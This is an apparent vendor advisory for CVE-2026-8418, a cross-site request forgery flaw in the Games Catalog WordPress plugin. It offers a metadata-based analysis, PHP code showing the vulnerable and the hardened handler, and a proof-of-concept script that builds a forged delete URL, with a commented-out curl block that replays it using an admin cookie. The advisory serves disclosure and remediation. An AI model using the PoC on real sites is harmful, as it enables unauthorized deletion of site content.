Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 20, 2026

CVE-2026-8418: Games Catalog <= 1.2.0 – Cross-Site Request Forgery to Arbitrary Game/Post Deletion (game-catalog)

CVE ID: CVE-2026-8418
Plugin: game-catalog
Severity: Medium (CVSS 4.3)
CWE: 352
Vulnerable Version: 1.2.0
Patched Version: none at time of disclosure
Disclosed: May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8418 (metadata-based): The Games Catalog plugin for WordPress, up to version 1.2.0, contains a Cross-Site Request Forgery (CSRF) vulnerability in the gc_crud() function. This allows unauthenticated attackers to delete arbitrary game catalog entries and their associated WordPress posts by tricking a site administrator into clicking a malicious link. The CVSS score is 4.3 (Medium).

Root Cause: The vulnerability stems from missing nonce verification on the delete action within the gc_crud() function. The function processes a GET request with action=delete but never calls wp_verify_nonce() or check_admin_referer(). Because this analysis is metadata-based and no plugin code was available, the root cause is inferred rather than confirmed: it follows from the CWE-352 classification and from the advisory's explicit statement that the delete action is reached by a GET request with no nonce validation.

Exploitation: An attacker crafts a forged HTTP GET request to the vulnerable endpoint. The likely target is /wp-admin/admin-ajax.php with parameters action=gc_crud and action_type=delete, along with a game_id parameter identifying which entry to delete. The attacker must trick an authenticated site administrator into clicking the crafted link. No authentication or additional privileges are required from the attacker, only social engineering to make an admin perform the action.

Remediation: The plugin must add nonce verification before processing the delete action. The fix requires generating a nonce with wp_create_nonce() when rendering the deletion interface, then verifying it with wp_verify_nonce() in the gc_crud() handler. Alternatively, check_admin_referer() provides similar protection: it verifies the nonce and terminates the request on failure. Since no patched version exists, site administrators should remove or disable the plugin until a fix is available.
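As an added illustration of this fix (not the plugin's own code, which was not available for this metadata-based analysis), the following is a hypothetical reconstruction of a gc_crud() delete branch as the CWE-352 description implies it behaves, beside a hardened form that binds a nonce to the specific game_id and adds a capability check. The nonce action string gc_delete_game_ and the helper gc_delete_link() are assumed names; action_type and game_id follow the advisory.

```php
<?php
// Added example, not the Games Catalog plugin's code. Function bodies are a
// hypothetical reconstruction; only gc_crud, action_type and game_id come from the advisory.

// BEFORE (the CWE-352 defect): any GET carrying ?action=gc_crud&action_type=delete&game_id=N
// is honoured, so a link an admin is tricked into opening deletes the entry.
function gc_crud_vulnerable() {
    if ( isset( $_GET['action_type'] ) && $_GET['action_type'] === 'delete' ) {
        $game_id = absint( $_GET['game_id'] );
        wp_delete_post( $game_id, true );          // no nonce, no capability check
        wp_send_json_success( array( 'deleted' => $game_id ) );
    }
    wp_send_json_error( 'unknown action' );
}

// AFTER: the request must carry a nonce minted for this exact game_id, and the
// caller must hold the capability. A cross-site forged link has neither.
function gc_crud_hardened() {
    if ( ! isset( $_GET['action_type'] ) || $_GET['action_type'] !== 'delete' ) {
        wp_send_json_error( 'unknown action', 400 );
    }
    $game_id = absint( $_GET['game_id'] ?? 0 );
    // 'gc_delete_game_' is an assumed action name; binding it to the ID means a
    // nonce issued for one entry cannot be replayed against another.
    $nonce = sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ?? '' ) );
    if ( ! $game_id || ! wp_verify_nonce( $nonce, 'gc_delete_game_' . $game_id ) ) {
        wp_send_json_error( 'invalid or missing nonce', 403 );
    }
    if ( ! current_user_can( 'delete_post', $game_id ) ) {
        wp_send_json_error( 'insufficient capability', 403 );
    }
    wp_delete_post( $game_id, true );
    wp_send_json_success( array( 'deleted' => $game_id ) );
}
// Register only the authenticated hook; no wp_ajax_nopriv_ variant exists for this action.
add_action( 'wp_ajax_gc_crud', 'gc_crud_hardened' );

// The delete link rendered in the admin UI must carry the matching nonce
// (wp_nonce_url() calls wp_create_nonce() internally); otherwise the hardened
// handler rejects the plugin's own button as well as forged links.
function gc_delete_link( $game_id ) {
    $game_id = absint( $game_id );
    $url     = add_query_arg(
        array( 'action' => 'gc_crud', 'action_type' => 'delete', 'game_id' => $game_id ),
        admin_url( 'admin-ajax.php' )
    );
    return wp_nonce_url( $url, 'gc_delete_game_' . $game_id );
}
```

wp_send_json_success() and wp_send_json_error() end execution, so each failed check stops the handler before wp_delete_post() is reached.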

Impact: Successful exploitation allows an attacker to delete game catalog entries and their corresponding WordPress posts without authorization. This causes data loss and disrupts site content. The attacker cannot modify or create content, only delete existing entries. The impact is limited to integrity loss of specific game catalog data.

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.


PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8418 - Games Catalog <= 1.2.0 - Cross-Site Request Forgery to Arbitrary Game/Post Deletion

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress site URL
$game_id = 1; // Game catalog entry ID to delete (must exist on target)

// Build the request URL
// The vulnerable endpoint is assumed to be admin-ajax.php with these parameters,
// based on the CVE description mentioning action=delete via a GET request
$delete_url = $target_url . '/wp-admin/admin-ajax.php?action=gc_crud&action_type=delete&game_id=' . $game_id;

echo "[+] Atomic Edge CVE-2026-8418 PoC\n";
echo "[+] Target: " . $target_url . "\n";
echo "[+] Game ID to delete: " . $game_id . "\n";
echo "[+] Generated CSRF URL (requires admin click):\n";
echo $delete_url . "\n\n";

echo "[+] Note: This PoC only generates the CSRF URL. An administrator must open it for the deletion to occur.\n";
echo "[+] The attacker would trick an admin into clicking this link via email or social engineering.\n";

// Example: To directly test whether the endpoint honours the request (requires an admin session cookie)
// Uncomment the following block to test with a known admin session
// This is for educational purposes only

/*
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $delete_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=admin_session_cookie_value'); // Requires a valid admin session cookie

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Response Code: " . $http_code . "\n";
if ($http_code == 200) {
    echo "[+] Request processed (game may have been deleted)\n";
} else {
    echo "[-] Request failed or access denied\n";
}
*/

echo "[+] PoC complete. To create a working exploit, replace the admin session cookie with a valid one.\n";
?>
